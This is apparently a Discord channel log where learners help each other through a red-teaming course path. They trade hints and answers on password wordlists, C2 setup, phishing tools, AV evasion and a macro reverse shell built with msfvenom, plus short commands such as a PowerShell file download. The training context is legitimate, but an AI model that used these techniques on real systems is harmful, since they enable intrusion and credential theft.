#red-teaming-path

🥳

For Ticket Event related inquiries, please use the #1017019049181450291 channel (in the Support section).

Hey! I need some help with setting up the page at Gophish. I cant get the html code to work 😦

Hi all . Im at Red Team Fundamentals, Red Team OPSEC Room.

I quite lost/confused even after reading the hint for task 7. What do they mean four question ? Arent there 5 ?

okay, i geddit 😂 now i know why there's 4 question.

I signed into Discord this morning about the same exact question! Admins, I think you need to re-word this one...

oh wow they now include some network rooms on paths.....

i hate this question

Wtf are "White Cards"

Can't find a reference anywhere or I'm just a bad googler

I mean AD is a fundamental element to most red teams. And a network is the best way to learn AD 🙂

true

hahahah so its not me

because i was so lost at the question. and yeah i think that task question have to re-structure abit

“red team white cards” comes with plenty of references

Yep, bad googler. Thank you so much

Gave +1 Rep to @brisk path

white team red cards not so much

A good example of a white card is in the case a threat simulation calls for the use of 0day vulnerabilities. In most cases there are none available to a red team, so the use of it is simulated (as if it was used) in a particular attack scenario.

Lol yeah the content has been really good but that question was beyond confusing. I just bruteforced the answers and still they don't make sense to me what they are asking for

In the Intro to C2 room on Task 6 I am only able to get the NTLM hash of the Administrator user and not Ted

Any ideas as to why this is happening

I'm in a Meterpreter shell and can get the other hash and flags fine

I used the 'Registry Method' to get it to work

Using 'hashdump' in a meterpreter shell like normal didn't work for me

This is the only question that I need to complete the room 😢

can someone help me at this quesstion?

is not |||spear phisinh|||

?

heres some proof i guess

nope check the navigator... there is another thingy

shadow recommends you check the hint and check navigator too

have you opened a shell as ted and then ran hashdump??? or using meterpreter and kiwi

also, make sure to scroll enough! everything related is highlighted so it should be doable to find it 🙂

am i the only one having trouble on Task 7 in "Red Team Threat Intel"? I cant seem to find the correct answers/order

am i doing something wrong or is there a bug in Post Compromise - Enumeration task 3

it says the version number is incorrect

nvm i forgot to do ssh lmao

You found it already?

na sadly not

It is pretty "simple"

Use the Att&ck navigator

Search for APT41

And then match the TTPs to the chain

if that's the one where you are stuck at least

Yeah im already on the "map" of APT41 on Att&ack and tried to search for the Words in the Hint but i only managed to find 3 of them in APT41 and if i just fill out the other 2 it says something is wrong

in the top bar you see the different categories

those categories match the table

yes exactly thats how i found the 3 words but i cant find the others

If you have all APT41 highlighted you should have multiple options to be honest

You got it @languid surge :p

not yet ...5/6 now and the lolbas thing is missing ... Hope i got more luck tomorrow 🥲

can I DM you?

sure

Hi, I'm trying out this new path and I can't understand what's wrong with this crunch 5 5 -t 'THM@!' -o tryhackme.txtas an answer to the password attack room in task 4

I ran it locally and it does what is expected

it is asking you to use the one for generic symbols to be used not just those 2 specific ones

I am lost with one instruction on this room: https://tryhackme.com/room/redteamthreatintel

To use the ATT&CK Navigator: navigate to the groups summary page, next to "Techniques Used," navigate to "ATT&CK Navigator Layers," from the dropdown navigate to "view." An ATT&CK Navigator layer should have opened with the selected group's TTPs highlighted in a new tab.

@ - lower case alpha characters

, - upper case alpha characters

% - numeric characters

^ - special characters including space

Referring to: https://mitre-attack.github.io/attack-navigator/

Where do I find the "groups summary page"?

first you go here: https://attack.mitre.org/

then you click groups

then search for the group name using ctrl + f

then check a bit down the page under the box and there is a button for opening navigator

It's a bit confusingly phrased when the hyperlink in the sentence before this one reads "ATT&CK Navigator" and points to https://mitre-attack.github.io/attack-navigator/.

Thanks for clarification.

no problem.... hopefully you can answer the questions now

Yup I am unstuck now 🙂

Understood! I didn't get the question right. I'll try to generate it using special characters

Hello

Can I get some help :)

My last final question and yes I did Google but 😅

It is in the text above 😉

Ahh

Still not found

Have you tried ctrl+f to search the answer ?
I cannot give a better hint than suggesting you to read the paragraphs above once again

Look for ||Operators are also expected to||. It's in that sentence

should be a fun weekend ahead with this new path 🙂 but its kinda double edge sword by having some of these rooms done already in regards to the getting the tickets

def aint resetting all the AD rooms haha

omggg i got it

i should of used the number 3 insted of three

oh my dayysss

i love u Robert

the asterisks are there 🙂

the answer format (number of stars in the box) is an important thing

thanks so much

I know what you mean... Luckily i haven't had time to do all of the AD rooms

they are all great but too much time to go through again

Anyone having a difficult time finding the answer to the LOLBAS question in Task 7 - Creating a threat intel driven campaign?

which room?

red teaming - red team threat intel

Have you looked in the MITRE link?

I had some difficulties too, but I searched on the web

Yes, I may just be searching the wrong material gonna go at it for a bit for before moving on

I could not find a direct answer or a push in the right direction, might have to take a break and revisit it

You're looking for ||Technique T1105 in there|| . Knowledge of https://lolbas-project.github.io/#/download can also give you an idea of what you're looking for in the future

(very useful website)

Gonna use your spoiler as a last resort, I've looked on github for a few minutes. I'll look deeper. Your input and advice is greatly appreciated

Got it! Thanks!

Gave +1 Rep to @pseudo mist

Hey friends I have been battling with this for hours I’m not really sure what they ask us to do, can someone please give me some sort of idea

Number 1

I can't enter the room at the moment but I think you need to enter the technique names as per the table in the top of the screen shot

try using those and put them in the correct order

Thanks friends I figured it out

great 😄

So shadow recommended this order. After what pathway should I start doing red teaming path?
#pre-security-legacy-path 
#974406074444685322 
#junior-pentester-path 
#pentest-plus-path
#web-fundamentals-path 
#offensive-pentesting-path 
#791764435991658556

Hello friends please can someone take a second to explain what we are suppose to be doing here ? Just find it so hard to understand what the question is

Would appreciate as much hint I could get thanks

You have to associate "Knowing that their company..." to "Assess risk" (4), "This will depend on the company and the blue team" to "Apply appropriate countermeasures"(5) and so on
But it doesn't make sense to me honestly

Typo on OPSEC page @elder olive

Anyone else having issues with GoPhish constantly spinning?

yeap having the same issue :/ the infinite loading of death

ok just checking. I was excited to use that tool too lol

samee! it looks really cool ^^

I just went ahead and downloaded the installation to my linux machine.

forget about the hint, the hint was quite confusing.

look at the answer field , the first 2 number they give u is the right answer. so 1st bullet falls under RISK (4) and 2nd bullet falls under COUNTERMEASURE (5).

so you are left with Critical Information - (1), Threats - (2) and Vulnerabilities - (3).

So when reading the bullet point number 3, which number (1,2 or 3) do you think it falls to ?

something like that .

yeah i agree. i really like the content they give for this one. so far i been learning a lot about red teaming engagement so far. anw i tried to bruteforce and it didnt work 😂 maybe i do it wrongly. took a coffee/smoke break and got a lightbulb from it. thats how i clear that question 😂

Can someone help me with this question in Room Enumeration Task 5- DNS question 1 , I use Dig to carry out a domain transfer, but it not return the flag ? any hint for this task, Tks all.

which room?

Hello, hope all are enjoying it

learning path Red-Teaming - Post Compromise - Room Enumeration- task 5- DNS

you need to use the right dns server

if you stuck, just read the task again

Just started the red teaming path

Trying to understand this, if armitage does not listen on loopback, then why does the example bind the port to the loopback address?

Intro to C2 room

Can i get hint for these questions?

Say you already set up teamserver on port 55553 on your C2 server, which is on 192.168.0.44. You can now use another unix machine (lets say 192.168.0.100) to access that armitage server that you set up by port forwarding.

The full command is 'ssh -L 55553:127.0.0.1:55553 root@192.168.0.44'

• Means: I want to Port forward port 55553 from 192.168.0.44 to my localhost which is 127.0.0.1 on port 55553.

So now, when you open another terminal in 192.168.0.100 and run ss -tulpn, you see that now u have access to your armitage server on your localhost 55553.

Feel free to correct me if im wrong. im always open to improve myself 🥳

Look at the Mitre Attack Website on APT 41, there's a few way on how they transfer files.
Look for 'messages' in that page too for the 2nd question.

Guys, I've been stuck on this question. Evading logging and monitoring lab for the past two hours.Please help me.

@potent crest I think I get it: the admin sets up the command shown in the example, but another team member would use the syntax you wrote in your example.

Yes sir ! You can try it tho to understand better with hands-on ! 🥳

If you have a look at Task 7, what kind of GPO logging is common? (If you're having trouble with this kind of thing i definitely suggest going back through the task/tasks and re-reading bits 🙂

I'd recommend looking at the MITRE link. there's also a hint at #red-teaming-path message

will do!

Hey guys, I am following along the "Intro to C2" room and i am trying to run armitage on my own laptop. I've started the teamserver and I've connected successfully, but when i try to start a listener in the armitage I am given an error in the console that says "Timed out while executing 'use exploit/multi/handler' last read = {data=, busy=false, prompt msf6 > }; current prompt msf6' " After that i am presented with two or three errors of the same kind. Does anybody have an idea how can i fix this. Thank you in advance.

My guess would be connection issues. what OS are you using, and have you set up the VPN and tried to ping/scan the host?

I am using Kali Linux 2022.3 . And no I've not started the vpn, yet, because I didn't think it was necessary to be connected to the THM server

aren't you trying to exploit the VM in the room? I may be wrong as I ahven't done that room, but that's normally how our rooms work.

I've not yet reached that part😄 . There is a task before it just to set armitage

Hello guys, maybe someone can explain about John the Ripper "Single-Extra rule", how to use it? Password Attacks room

BTW I've decided to skip this step and go onto the next one. Surprisingly enough i was met with the same exact error but with a different listener 🥲

need some help with runtime detection task 6

I keep getting error

In the Password Attacks section, part 4, question 2. I ran the crunch command in terminal to generate the list to produce what it wants, but it's not accepting it as the answer. Am I doing something wrong?

you made a mistake

Gotcha .... any advice on where I messed up?

in Crunch command

im stuck (not in a washing machine) but at the obfuscating challenge-8.exe

obfuscation principles

That one made me laugh, what are you having trouble with?

getting the flag

like getting rid of meaningfull identifiers

i dont understand maybe my brain is broken

Walk me through what you're doing, how you've obfuscated, what you do to compile and anything you do after compilation (hint hint)

so

i took the snip like they tell to do

i look and i think removed MFID

compile with mingw

to challenge-8.cpp to challenge-8.exe

nm + strip

and send it

wrong as it seems to be

so i retake the snip

and im lost

i dont know wtf im a doing

So, you might want to chuck in some code flow and logic stuff, that does nothing except obfuscate, have you renamed variables, split up strings etc?

NO

OK THANKS

I KNEW IT

no i didnt know

mayber im not obfuscating enough

@pseudo mist can you explain to me in a voice chat ?

Sure, I'll head down ther now

Hello friends I’m trying to solve the C2 room task 4 but each time I try to set up the machine using the preparing our environment instruction provided after the first start that have to do with starting postgresql…

When I try to run msfdb —use-defaults delete

I get an error is there anything I’m missing help mate

@jade flume are u using ur kali or tryhackme ?

try to run sudo teamserver <your ip> <secret>

I try to use my machine but have problems with the installation so I switch back

To attack box

I have to try this and see if it worlds thanks my man

i now understand why you said that it will be more hard after the obfucations principles

im stuck on downloading the file because WD delete it

and i cannot download it from the web it said access denied

🤣

oh, yuuuup, use SCP via openVPN directly into a machine that Windows Defender can't see (or set an exclusion for a folder, like there's the exclusion in the VM)

sorry i just woke up im fucked up

i didnt thought about that

you almost have the correct command.... just 1 letter/character is wrong.... and it is in the ||THM^!|| part

I appreciate the follow up, I was able to figure it out

Also struggling with finding the answer to the first one. Second one can easily be found with CTRL+F-ing the appropriate ATT&CK page

https://tryhackme.com/room/opsec task 7.... question 1.... shadow is super stuck.... any hints???

did you check the: https://lolbas-project.github.io/#/download website robert linked to???

definitely helps to have the background knowledge for that one

or google/duckduckgo kung fu powers

searching for APT41 lolbas gives a few results

Oh... That... The first bulletpoint is a risk (so 4), the second bullet point is a countermeasure (so 5), the third is a... We're looking at getting this re-designed

yeah understood what the first 2 was based on the hint and that the answer box kinda states it

just all the other combos after seem to not work even when shadow thinks they are right

so they just left and decided to do command and control instead

after watching a video about cheese to calm down

I can send you a DM, but it's basically gonna be the answers, as that isn't an easy one to explain

if you want to you can do that.... shadow would not mind.... better then trying all the combinations through brute force

+rep @pseudo mist

Gave +1 Rep to @pseudo mist

When you do the --rules in john and run it what is the syntax to out put that to a file?

if you run man john it should tell you, or maybe john -h?

I am not seeing it in either one

--stdout

then | tee blah.password.list.txt

Thank you! I totally forgot about | tee, but I just used > list.txt and it worked also. Thanks again.

Gave +1 Rep to @royal void

no problem

and yeah remembering the stdout parameter/option/flag to output is kinda tricky

though you can grep for it

Well, I read that and was trying it but I was obviously using it wrong lol.

thanks

Gave +1 Rep to @pseudo mist

I see, so many guys got red teamer titles

anyone had any issues so far in the "Phishing" room with the GoPhish machine just getting hung with a loading animation? (not nginx error) have already tried clearing cache/history and multiple web browsers as well as re-deploy of the machine. loading animation is on every page

on the obfuscation task 7 Arbitrary Control Flow Patterns, the sample code doesn't compile because of a syntax error with case.
The line is
" for y in case_1:
match swVar: <<--
case 1:"
"
and the error basically says invalid syntax. I tried other versions but it didn't work.

I ended up changing to an if elif and got the flag but IDK if there is something obviously wrong

same issue, i cannot add new profile , loading animation all page

I had that issue yesterday. I honestly can't remember if I used open vpn and a browser page or if I pressed the view in full screen arrow. Probably open vpn.

On Evading Logging and Monitoring Lab I got this error. I am on the final stage.I did all the steps 5 times.but didn't understand. I have been doing this for four hours now.

can I dm someone about password attacks task 9? I don't want to post any spoilers.

What am I even supposed to do here? I have no clue

The hint is also very confusing to me

Room -> https://tryhackme.com/room/opsec ; Task 7

They want you to put them in order. They give you the first 2 numbers so you have to figure out which number comes next. Make sure you put spaces in between each number.

been stuck on the DIY sandbox evasion challenge for about 4 hours lmao... Everytime I run my c++ script it does this, can't seem to figure out why

Yeah it didn't make sense to me either. I just brute forced it because it gives you the first 2 numbers... so just put the other numbers in every order you can lol

want the answers???

or will you just brute force it like everyone else???

just realised I need to wait -_-

Had the same problem while I was connected using OpenVPN. If someone has this problem try connecting to the site using the attack box, it solved it for me

need to arrange them in order

tks , using attack box , it solved

Anyone already finished on Win10Office2016-Installed under Weaponization? I would like to know if you guys used the rdp to run the scripts? and where did you input the code?

-- answered my own questions

I have had this VM running for about 15 minutes but it's just stuck on the spinning wheel of death. If I click "New Profile" or anything else - nothing happens. I have closed and re-opened as well as signed out and back in. Is this a common issue? I'll just try to reboot the VM in a little bit if it doesn't start working.

access link on Attackbox, it's OK

what happens after the 3 day access on the Breaching Active Directory room, do i just lose access to it forever?

You can just join again. We do that to flush inactive users from the network to save resources

ok thanks a lot

Gave +1 Rep to @white prairie

None of the valid combinations work though

Are you making sure they have spaces? I went through that yesterday and it worked. I agree that it isn't easy, but they do work.

Had the spaces, but used enter to submit, which didn't work. After clicking submit button explicitley it did work, finished room, thx for your help

Gave +1 Rep to @pseudo mist

I got the flag in a different way but it says it's wrong.

I believe I sometimes struggle understanding the question correctly 😅

like this one: "What is the crunch command to generate a list containing THM@! and output to a filed named tryhackme.txt?" 😂

I literally spent half an hour on this question, the learning curve is present

not all of those 1's should be 1's

How can I fix this issue on a Kali Linux machine?

this is for the dictionary attack on the hashfile

and where to run it then? :/

I am running Kali inside Virtualbox

the solution seems to be more simple by just assigning more RAM to the Kali machine

it takes a couple of seconds when you assign 8GB RAM to the VM 😄

Hello fam, just started my red teaming path ! Any tip or suggestion for someone starting from almost 0

If you're brand new the #junior-pentester-path might be suitable, it's aimed more towards beginners 🙂

I’m subscribed to the website so looking for the best courses to start with

Gonna def check that

I would personally also recommend the complete beginner path

it contains lots of interesting basic concepts

true

because I am personally a bit surprised by the No prior knowledge for the read teaming path

if you dont know Linux commands it will be a difficult one

as well as understanding other basics

but again, this is my personal opinion

It is recommended to complete the jr penetration tester path before red teaming

I would also suggest do use the 'Easy' pathways first. (Pre security, Complete beginner, introduction to cybersecurity). Then proceed with the jr pentration tester OR the red team path.

I appreciate ! Thanks

Gave +1 Rep to @feral sage

Gave +1 Rep to @tight granite

I didnt get a rep 😢

Into to c2 room, need help with armitage, I can't get meterpreter shell, i used metasploit for the same exercise and it was flawless, but the task says to use armitage.
I can use exploits i get direct shell , and can't run commands like hashdump, i tried using the post/windows/gather/hashdump module , i get incompatible shell type

What is the crunch command to generate a list containing THM@! and output to a filed named tryhackme.txt? can help me out

@ornate hull the option is "3 letter word + special characters"

Thank you mate i got it i just tried in my kali machine

Gave +1 Rep to @potent crest

nice one sir !

i am doing it wrong

crunch 5 5 -t TMH^! -o tryhackme.txt

You need to put THM(and symbols) bit in double Quotes, and that ! can also be any other special symbol.

@ornate hull very close, replace the exclamation mark with something similar there

^

crunch 5 5 -t "TMH"^ -o tryhackme.txt

yeah, there's some flexibility on the answer as there's a regex to check if it's "right", but 3 characters out will defo be over 🙂

the quotes should be around the symbol bit too

so crunch 5 5 -t ||"THM^^"|| -o tryhackme.txt

thank you

yeah i realise that ! i think i did submit a single quote around it but fail. When i submit without the quote it work, but after reloading then i see they included the double quote already.

it was a rollercoaster ride for awhile 😂

sorry i was trying with TMH not THM

trymehack doesnt work bro 😂 but honest mistake down there haha

Once you have the cmd.exe shell, you’ll need to escalate that shell to a meterpreter shell

my bad 😄

aaah man, I am gonna be so mad if the password crack is wrong 😂

128 tries/min and there are 50k passwords to be tested

https://tenor.com/view/confused-what-really-no-words-huh-gif-4487358

it is the online password room

which task ?

or I am making an mistake 😅

ahh im 4 task away from it

hahahah

task 8, the one where you need to make a rule-based dictionary

as a rule of thumb, thm rooms shouldn't need bruteforce of longer than approx 5 minutes

tbh I followed the steps, made a list clinic.lst as said, make the dictonary adding 2 numbers + a symbol

and that made 50k passwords? seems excessive. I may be wrong though

well .. I did use like 6 different symbols since the symbol itself wasn't shown

just use crunch with the ^ symbol 😄

it still gives you a lot of options I believe 😛

Hmmm, i see the hint is pointing you at john rules, so i may be wrong with crunch, but i'd probs stick to just the 4 used in the demo in Task 6

yes

I narrowed it down a bit to 20k options

ok, got it 😄

that's a start 😄 I'll wait for someone who's done the room to chime in

cool exercise to be honest 😄

stuck at this point as well 😄 Did you manage the smtp password? I always get "[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 454 4.7.0 Temporary authentication failure: Connection lost to authentication server" This is not normal, right?

yes I got it

well it is normal

because you don't have the password yet

maybe your list is not well populated

Did you make a rule-based dictionary changing the john.conf @brave sinew

ah, this is basically the message for "wrong password"? for me the message sounded more like " hey your AUTH method will not work at all"

Then we have to wait some more decades. this is slow. (i used mentalist to generate a wordlist)

well to be fair

if you have the right dictionary

you should have it in less than a minute

^agreed. Once you have the right dictionary it takes about .03 seconds to crack

glad to hear it 😄

https://tryhackme.com/room/signatureevasion

task 7 i dont understand shit 😭

how can i encode manually to set my host my port and the runshell

confused My wordlist from task 7 has 105 entries. the rules multiply it with 200. and i test ~100/min.

If you're Trying to post a screenshot, you'll need to verify

!docs verify

ahah ye

I'll do it

ty

So I got stuck on this for a while also. I kept changing my rule and building out different password lists until I got it. My final pass list was only about 20 words.

I don't know how much of a hint or bump you want or I am aloud to give on here.

So, as I said, I’m doing Active Directory Basics, at Task 4 where we have to found the flag on Sophie’s desktop. When I’m trying to Connect to sophie account I get this :

ahh wait. I think I missunderstood the task. Thanks, will try a bit more 🙂

Have I done something wrong ? ^^

Are you connecting from the attackbox/your own VM, or from the windows machine in the task (this one probs won't work)?

windows machine

First exit out of Phillip rdp^

oh ye I'll try that

The in-browser machine counts as a RDP session, so connect from another machine

ty 🙂

it works, thx

Have a nice day all !

I'm currently in the Network Evasion -> Firewalls room. Stuck at task 7. I'm not pretty sure how to setup the port tunnel, someone has some hint? (pm also possible)

in "Introduction to Windows API", Task 7 q "What type of method is used to reference the API call to obtain a struct?"
I can't find answer to this? Is the answer available in the Task 4 content or I have to read MS docs to find the answer.

It is available in the task 4 content, the shortened version of it is highlighted as code, but it's towards the end of the sentence.

(and yes i feel like i'm writing riddles trying no to give it away entirely 😄 )

O thanks

Gave +1 Rep to @tulip pulsar

did it work already?

Not all rooms are free right?

Correct, About 80% of rooms on THM are free, but that percentage may not be representative of a path.

YES :). Just wanted to say I reduced the wordlist to likely passwords and it didn't help, but my larger WL finally suceeded. Didn't expect this password to be the solution 😄

2 more passwords to go in this room

yes I am working on the last one 😄

Task 9 for Password Attacks Room.

Any hint for the year and special characters ? 😂 I already tried 2021 and 2022 with !@#$ as special character. Am i missing something here ?

I need to start task9 😂

🥳

@celest vessel lets go

you found it?

still trying

ahh i actually got, just that it didnt stop when found the password

i fixed it

hahahaha

yall im in sandbox evasion room and unable to compile cpp files, all it displays is "attach". how are we supposed to compile it? im trying to compile a sleeper file into exe

did you make a list then @potent crest ?

yes

i make a list as the hint suggested

• manage to play with some rules i learn in that room too.

hmm 500 tries, no hits

shdnt be more than 200

How u craft ur password list ?

with john

okayokay

just share u problem here later if u are still stuck

got it, something with capital and non capital letters 😂

yes

😂

going to take a break 😄

fixed it

i need help or a hint in rule based the last one

"S[Word]NN

@ornate hull - @pseudo mist assist you by giving the spoilers already

@potent crest I will figure it out

https://discordapp.com/channels/521382216299839518/1017053384441868418/1017779778876624936

does any one completed sand box room
dm me plse

plse helpppppppppppppppppppppppppppppppppppppp

Task 5 - Phishing Room, is the website lagging ?

More people are getting on so could be the case

I require help with task 7, flag 14. Can anyone assist me?

There's a lot of questions already solved in #999008613102260275 🙂 If you can't find a solution to your problem, just drop a line there and I'll help

Hi, i need help in understanding what i need to do in a Task, dont whant any answer but my english is not the best and i have not figured out what i need to answer in the web page.

Its in Red Team Threat intel - Task 7, the web site

Check out the hint!

Thank you, i think i overthinked it

Gave +1 Rep to @wanton nacelle

Happy to help!

@jade flume hello

I just saw this and can u help me with those 3 questions, the picture is kinda blurry

open the APT41 page and read it thoroughly

okay 2 done , still stuck at this tho

@manic shadow it in APT 41 software table

This ?

@manic shadow Yes the

Alright if this is the right page to search in...

I seem to not be able to figure it out

@manic shadow it the ||ASPXSpy||

Thanks , I appreciate the help

Gave +1 Rep to @ornate hull

@manic shadow Anytime mate

still missing the two http-form password attacks 😄 😦 So many options what rules to apply.

haha

are you still working on that one? 😄

I found the http to be a bit more simple

had a break with other things to do, but basically, yes 😦

I get you, I also took a break 😄

is the password format given in smtp task valid for the website = all passwords or just for this specific smtp password?

even with the walkthrough it says false i dont understand

22 WSAConnect 22WSAConnect False 58 WSASocketA 58WSASocketA False True 5A WSAStartup 5AWSAStartup False True A5 htons A5htons False

only for the specific smtp

Hi, can anyone assist pls to explain an answer in the Red Team Threat Intel Room Task 5 TTP Mapping question "How many Command and Control techniques are employed by Carbanak?" I got the answer by a process of elimination but in the mitre-attack data there are 16 C2 techniques listed - can't work out how the answer is determined. Many thanks

Not all of these 16 that are available are selected in the navigator

if you scroll up and down some of the boxes are highlighted in blue....

Thanks for the quick response. The penny just dropped for me as I was doing task 7. Appreciate the help.

Gave +1 Rep to @native berry

ooh nice you figured out how it works

Thanks @royal void appreciate the help.

only 1 rep point giveaway every 5 mins... but yeah no problem

• @royal void

Gave +1 Rep to @royal void

Always worried about the rep 😄

¯_(ツ)_/¯

Evening all

Dropping something for people to find when searching. The GoPhish task in Phishing will spin. However, on your VPN system, go to the site https[://]YOUR.LAB.IP:443. It should load.

Doing the above will allow for completion of the task just fine. Happy hunting!

Thx answered my question before I even asked. Lol

Red Team Theat Intel --> Creating a Threat Intel Driven Campaign --> Kill chain site has 6 answer options instead of 7

Did anyone else answer those answer those questions?

@fresh harness start with weaponization

I'm sure I did. Is that the one with the flow chart that you fill in the blanks for?

2-7 in kill chain

The iconography is infuriating.

I did but it says, At least one of your answers is incorrect.

But thanks

Just as a general tip, it's subtle, but you will find a red line under the ones you have wrong.

@fresh harness That question drove me crazy

Ahh, you're supposed to look at the APT in the question and put down a technique they use into the correct blank.

@fresh harness hit hint tab

So, if they use Scheduled Tasks for persistence, the answer would be Scheduled Tasks.

I see. Thanks.

Gave +1 Rep to @molten summit

Hello mate, I’m having problem with weaponization room, task 5 I have been able to make the calculator pop up but I’m trying to chain it with a reverse shell like it was instructed so I generated a payload with msfvenom but the issue is after getting the output and Saving it in Microsoft I could not open it I get an error, so I have few questions that I could appreciate anyone that could help me with it, do I have to save the file as document1 or doc to make it work and again do I have to include the extra payload in the document or just output of msfvenom only

Just the output of msfvenom, I believe.
Also, there is one thing to change in the msfvenom output of the VBA script that they mention. Don't miss that!

Just the output starting the #EndIf statement right ?

From ***

From #If Vba7 Then
.....to....
End Sub

The last End Sub

I get compile error mate

That’s from me trying to run it

To make sure it’s working from saving tho

Does that matter atall ?

Or do I just save and see if it works

I'd say put what you get from msfvenom into the macro, nothing else in there. Save and re-open the doc.

Thanks man

Feel free to make multiple docs for each of those steps, like one that just starts cmd, and another doc that starts calc, and another with your reverse shell.

Bingoooo

We are innn

Respect @molten summit

And I think as a bonus, once you get meterpreter to connect and get a session, look up how to download files from c:\users\...page, and save your docs to your local system! 😄

Just note that you need two slashes for that command....Discord doesn't like that, though. C:\ \users\ ....

Yes right I get the point you the man respect

good luck!

It work already thanks man

Doesn't work on port 443

Weaponization room is one of the sleekest room I have ever done in my life

😍😩

Be sure to use https.

You mean for a real life sceneries ?

Well, I mean yeah it's generally good advice, I suppose.

can any help me in password attacks on task 8 rule based event

How do we do that ? Can I use python still ?

I’m yet to do it mate I should be on it now

@jade flume done mate

https://makendy-piton.medium.com/how-to-use-https-on-localhost-linux-87b1f10771e6

find this article it should be useful for others so I thought I could share…

Anyone available for help on Windows Local Persistence Flag 17?

I’m yet to get to that mate would have love to help

No worries man it is kicking my a$$ right now.

I need help mate password attack, task 4 I inputted, crunch 5 5 -t THM@! -o tryhackme.txt as the answer but it won’t allow so I change it to 7 7 THM@!%% but the problem persist is there anything I’m missing here

Damn I can only imagine my man lol this is hacking for us

Try cyberchef, if you’re having problem

I had the same issue

You almost have it, everything is good with the 5 5 command except one thing. So go back and read there is a certain character you can use for "special characters". Then think about what you use to combine a string?

Sorry trying to give help without spoilers is not my strongest ability lol.

Task 9 in password attack season + year + special characters I am doing anything wrong

Oooof

You have it?

Otherwise I might give a small tip

Cannot get armitage running in room INtro to C2 Task 4. I am getting following error message when launching armitage:
Exception in thread "main" java.awt.AWTError: Can't connect to X11 window server using ':0.0' as the value of the DISPLAY variable.

I am running kali 2022.1 on a VMware Fusion on a mac m1

Can sb helps me in the "Windows Local Persistence" Room flag13? Tried everything but didn't work

Hello, anyone having trouble with the Phishing room? I cannot get the GoPhishing to load properly. In dashboard the loading animation keeps on playing and I can't create any new profile/campaign

Hi,
I am stuck at Task 8 (Using MSSQL as a Backdoor) of Windows Local Persistence.
Does anyone know where should "evilscript.ps1" be located? At attacker or active machine? Thanks

I think it should be the active machine

Hey mate I’m having problem understanding task 8 question, password attack room, what word list were they referring too when they said clinic.lst

Someone help

Noted & thanks

Gave +1 Rep to @jade flume

It is referencing the password list you create in Task 7 from clinic.thmredteam.com

Damn thanks I get it now🫡

Gave +1 Rep to @naive lily

Did you get the hydra one done? Or stuck on smtp?

I’m having issue generating the word list but I’m use too using hydra for brute forcing all sort of network services that should not be a probs on its own atall

Task 7 gives you the exact command to generate the base wordlist. Task 6 answer is how you should modify that base wordlist to answer Task 8

Task 7 + Task 6 = Task 8

I need help with task 2 on Signature Evasion lab. How can I split DD or split because Windows doesn't support these commands?
Port 22 is closed. How can I scp the shell.exe?

Maybe setup a web server then you use powershell -c wget “http://yourIP:port/file_to_get

how can I start a web-server on windows machine?

Im on the phishing room, and the gophish website just skips spinning, not responding

If you are trying to send from windows then it’s better to use pscp directory to file you are trying to send user@ip/directory_you_are_trying to_send_too

.

Maybe I'm missing something about how this documentation is written, but why is the date range labelled "engagement dates" not the answer for "engagement end", preferring instead the date listed for "post exploitation and persistence" (also why does this phase fall outside the engagement period?)

Red Team Engagements, task 7

https://tryhackme.com/room/passwordattacks
task 8 question 2
i keep getting this error message
"/etc/john/john.conf" E212: Cannot open file for writing

Did you open the file with sudo?

@nocturne stump

tired it with and without same error

Thats weird, is the file existing?

You def need root access to edit that file

the folder does not exist /etc/john

Then you have found the issue

Try to reinstall john?

tried to reinstall john now

trying

Ok 👍

Thanks pope

No problem!

thanks @celest vessel

Gave +1 Rep to @celest vessel

Try to change from command to windows powershell

Sorry for the late response

am i doing this wrong?

i sorted it

Is there somewhere to post general feedback, just so it doesn't get buried?

The style of questions of the "view site" sections in this path so far are pretty confusing at best, this is a particular offender.

Oh man, those questions were awful.

Just awful.

yes a lot of people struggled on those 😆

It's not even clear what exactly it's asking

I would also like someone to acknowledge my previous question, if it is indeed an error

you have to match each response to one of those topics

each number is only to be used once

It's probably a typo.

I mean, assumed it was.

I tried in both cmd and powershell.

Those questions could be slightly useful if it would pause after you get the right answer, so you can try to decipher wtf it's the right answer.

But as they are, that was a step back, learning-wise.

Or make some kind of matching interface

or just do each one at a time

Instead of typing in a string to match statements together with no feedback, with poorly worded instructions

This works, but I'm guessing there's a reason they departed from this being used in every other path

I believe a lot of people bruteforced the answers

to be fair, I also found it to be a very weird thing 🤔

The first one or two I did, because I had no idea what was going on. Then when I tuned in, it still made no sense.

So yeah, I bruteforced them all and moved on.

People understanding the content but not being able to answer the question seems like a worse alternative

people who bruteforce are still going to find the answer, or a guide

I am not sure what you mean but given that the first two digits are already shown, filling in the last three wasn't a hard thing to do

and a lot of people already posted comments about that section

It's being redisgned.

Scratching my head over this bit, didn't even realise it says "Coutermeasures"

*Covenant by Ryan Cobb is the last free C2 Framework we will be covering *
The section about sliver is after the section on Covenant, which is also free unless it's in the wrong section

Has anyone completed the phishing room

I am positive someone has, yeah

I am working on that one as we speak

yes what is your question???

Task 5 using, go phish the website doesn't work none of the buttons work, I'm supposed to create a new profile

For the GoPhish portal, don't use the public address/link. On your VPN system, go to the site https[://]YOUR.LAB.IP:443. It should load.

reload the web page.... after waiting a few mins for it to start up.... then it should work

the public link worked for shadow after letting it start up for 5-10 mins

You have the patience of a creature of the night. 🙂

heh yeah that is a skill shadow developed when downloading games in their kid years..... steam game downloads on old dsl modems were slow as molases

This worked thanks

Gave +1 Rep to @molten summit

Just tried it again, the public link still doesn't work

okay then.... guess it might be slow or buggy

I didn't encounter any issue with the website (opened in Kali while being connected over the VPN)

I sort of suspect it the js may be referencing something on a private address, and if you stay fully remote it just spins until a possible timeout. I didn't bother to check too hard since I'm not THM QA. 🙂

oh yeah.... shadow had to disable some firefox extensions for it to work correctly

ahh that's an even better idea probably.

mainly dark reader as everything else shadow has disabled for tryhackme domains by default

I am having trouble with this question been over the task and don't see the answer in there (What setting name that allows you to modify the Host header in a Meterpreter payload?)

Google can probably fill in any blanks the room material has left out.

msfvenom -p windows/meterpreter/reverse_http --list-options
then read through the options and you should find it

am I the only one that ran into a brick wall in password attacks > online password attacks?

prolly took like 2 hours to get the http flag

still got nothing on the other 3

is the dictionary built with the "rule" [symbol][dictionary word][0-9][0-9] supposed to be ~500K words?

if anyone could help out that would be awesome, I'm not understanding where to find the Access Types?

read it

just read and you will find

oh damn, I see it. I've been doing this too long today haha

Which specific service on task 8 are u stuck on?

Was all of them

Had multiple sessions running for hours against burgess and pittman

Wound up finding the other with a lateral move from another task

Ftp was just available in browser, don’t think that was intended

